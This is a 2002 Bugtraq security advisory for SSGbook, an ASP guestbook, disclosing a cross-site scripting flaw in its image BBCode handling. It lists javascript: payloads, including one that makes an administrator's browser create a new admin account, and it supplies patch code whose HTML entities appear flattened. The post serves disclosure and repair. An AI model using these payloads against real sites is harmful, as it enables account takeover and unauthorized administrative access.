[27342] in bugtraq
SSGbook (ASP)
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Oct 8 13:51:25 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 08 Oct 2002 19:31:54 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F127ak1HTJcwXAtPyFC00019ee5@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Product : SSGbook
Langage : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting
PHP Code / location :
°°°°°°°°°°°°°°°°°°°°°
----------------- config.asp ----------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right
src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img align=right
src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left
src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left
src=""",""" id=left border=0>")
----------------- config.asp ----------------------
Exploit :
°°°°°°°°°
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]
e.g. :
[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]
Add an admin if an admin read it. Login : Pom, Password : turlututu
Patch :
°°°°°°°
In config.asp :
Add this line :
strOutput = Replace(strOutput, chr(34), """)
after
----------------------------------------------
strOutput = Replace(strOutput, "<", "<")
strOutput = Replace(strOutput, ">", ">")
----------------------------------------------
And replace this lines :
------------------------------------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""","""
border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right
src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img
align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left
src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left
src=""",""" id=left border=0>")
------------------------------------------------
by :
------------------------------------------------
fString = doCode(fString, "[img]http://","[/img]","<img src=""http://","""
border=0>")
fString = doCode(fString, "[image]http://","[/image]","<img
src=""http://",""" border=0>")
fString = doCode(fString, "[img=right]http://","[/img=right]","<img
align=right src=""http://",""" id=right border=0>")
fString = doCode(fString, "[image=right]http://","[/image=right]","<img
align=right src=""http://",""" id=right border=0>")
fString = doCode(fString, "[img=left]http://","[/img=left]","<img
align=left src=""http://",""" id=left border=0>")
fString = doCode(fString, "[image=left]http://","[/image=left]","<img
align=left src=""http://",""" id=left border=0>")
------------------------------------------------
More details in french :
http://www.frog-man.org/tutos/SSGbook.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
Discutez en ligne avec vos amis ! http://messenger.msn.fr
